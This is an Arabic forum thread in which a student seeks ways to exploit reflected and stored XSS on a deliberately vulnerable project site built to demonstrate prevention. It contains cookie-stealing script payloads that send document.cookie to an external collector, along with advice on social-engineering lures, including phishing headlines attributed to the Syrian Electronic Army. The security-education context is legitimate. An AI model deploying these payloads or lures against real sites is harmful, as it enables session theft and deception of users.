أبحث عن طرق استغلال لثغرة أمان بغرض مشروع تخرج؟

السلام عليكم

يمكنك حقن التالي في الحالتين وسيتم التنفيذ عند عرض الصفحة.

ملاحظة: الـ alert() موجود فقط للإشارة إلى نجاح تنفيذ الثغرة.

<script>img=new Image();img.onerror = function() {alert('XSS executed')};img.src="http://xyz.com/evil.php?cookie="+document.cookie;</script>

خذ بعين الاعتبار أنك لم تعرض لنا رابط مشروعك لنختبر الحقن عليه قبل الإجابة، علمًا أن شرحك للمشكلة متشابك وغير واضح تمامًا.

والسلام عليكم ورحمة الله وبركاته

بتاريخ 22 ساعات قال java:

 اخي احتاج طريقة استغلال (طريقة +كود اذا كان ذلك ممكنً) تنفذ بصورة صحيح وقوية تبرز تاثير الثغرة في الموقع  للنوعين وخاصة للنوع Reflected XSS 

أخي الطريقة يجب أن تعتمد على أسلوب الهندسة الاجتماعية. والهندسة الاجتماعية هي اسلوب يعتمد على الحنكة والدهاء لخداع الضحية واستدراجه إلى الضغط على رابط أو تسجيل الدخول ضمن صفحة أو تركيب برنامج.

على سبيل المثال في الحرب الدائرة في سوريا تستغل أطراف موالية للنظام الرسمي تُعرف باسم الجيش السوري الالكتروني عناوين كثيرة لاستدراج الموالين للمعارضة، من شاكلة:

- عاجل ملف مسرّب يضم أسماء جميع المعتقلين في فرع الخطيب.

- عاجل فيديو يظهر ماهر الأسد مصابا

- برنامج vpn قوي جدا لضمان سرية اتصالاتك

كما ترى فهذه العناوين سوف تجذب فئة مُحددة لتحميل ملف docx محقون أو تثبيت برنامج exe خبيث أو الضغط على رابط يحقن xml.

ما هذا إلا مثال. تعتمد الهندسة الاجتماعية على معرفة دقيقة بالضحية أو بالشريحة المستهدفة ومن ثمّ بناء عنوان يجذب الضحية بدهاء.

أحيانًا تحتاج إلى جعل المستخدم يملئ نموذج معين والضغط على زر، وهذا يحتاج إلى المزيد من التكتيك في بناء نموذج أكثر إيهامًا.

للمزيد انظر هذه الصفحة

جرب هذا المقال الذي يتحدث عن اسلوب تطبيق  reflected xss

https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)#Example_6:_Including_external_script

بتاريخ 6 ساعات قال java:

السلام عليكم

إخواني الكرام عندي مشروع تخرج لعمل محاكاة لمنع ثغرة (Cross Site Scripting attack(XSS  

صمت موقع وعملت فيه نوعين للثغرة هما Reflected XSS والنوع الثاني هو Stored XSS

الأول Reflected XSS عملته في رابط الصفحة يتم حقنه من خلال استبدال قيمة الQuery string والثاني يتم من خلال اضافة تعليق ومن ثم منعت هذه الأنواع من الحدوث في الموقع برمجيا واستخدمت لغة السي شارب في المنع والASP.Net في تصميم الموقع  ولغة الجافا سكربت في الحقن وكود بلغة الPHP لاستقبال قيمة الكوكيز وارسالها ورفعت كود الphp والموقع كلا على استضافة 

أنا احتاج الآن أن تساعدوني في طرق استغلال هذه الثغرة لأني نفذتها بطريقة بسيطه جدا  وخاصة مساعدتي في النوع الأول ReflectedXSS احتاج ان ارسل الكوكيز لكن جربت حقنة كود ارسال الكوكيز في الرابط ولكن لم يرسل لي رسالة وجربت نفس الكود عندما حقنته في النوع الثاني وتم ارسال رسالة وهذا الكود

<script>document.location= " http://java.comlu.com/it/xss.php?index=" + document.cookie;</script> لكني لا أريد أن احقن النوع الثاني بهذه الطريقة لان عندما يدخل المستخدم وبمجرد الضغط على رابط الصفحة سيتم  تنفيذ الهجوم

انا احتاج ان اجعل في النوع الثاني صورة او رابط تحتوي على كود ارسال الكوكيز وعند النقر عليها يتم الإرسال وفي النوع الأول احتاج إرسال رابط الى اي مستخدم وعند النقر علية يتم ارسال الكوكيز للايميل 

ارجو مساعدتي فلم يبقى لي سوى هذا الأسبوع لتسليم المشروع

وعليكم السلام أهلا أخي

لم أفهم المطلوب تمامًا، هل تبحث عن أسلوب خداع أم تستفسر عن التقنية؟

يعني هل تسأل عن الكود اللازم كتابته؟ أم تريد أسلوب هندسة اجتماعية لصياغة رابط أو صفحة خداع الضحية؟

بتاريخ 27 دقائق مضت قال يحيى:

 اخي احتاج طريقة استغلال (طريقة +كود اذا كان ذلك ممكنً) تنفذ بصورة صحيح وقوية تبرز تاثير الثغرة في الموقع  للنوعين وخاصة للنوع Reflected XSS 

بتاريخ 8 ساعات قال يحيى:

اخي انا بشكرك جدا  ولكني احتاج الى طريقة استغلال وليس الى طريقة خداع باستخدام الهندسة الاجتماعية او كيف يمكنني سحب الكوكيز باستخدام ال Reflected XSS

انا جربت كود ونفذ لكن فيStored XSS  حيث تم تخزينه بقاعدة البيانات وعندما يضغط الزائر على رابط الصفحة يتم سحب الكوكيز وارسالها للايميل وتحويلة الى صفحة اخرى  ولكن هذه الطريقة سيلاحظ الضحية ذلك انا احتاج طريقة عملية للاستغلال والاكواد المستخدمة فيها او مساعدتي برابط اوماشابه رجاءا

 

 

x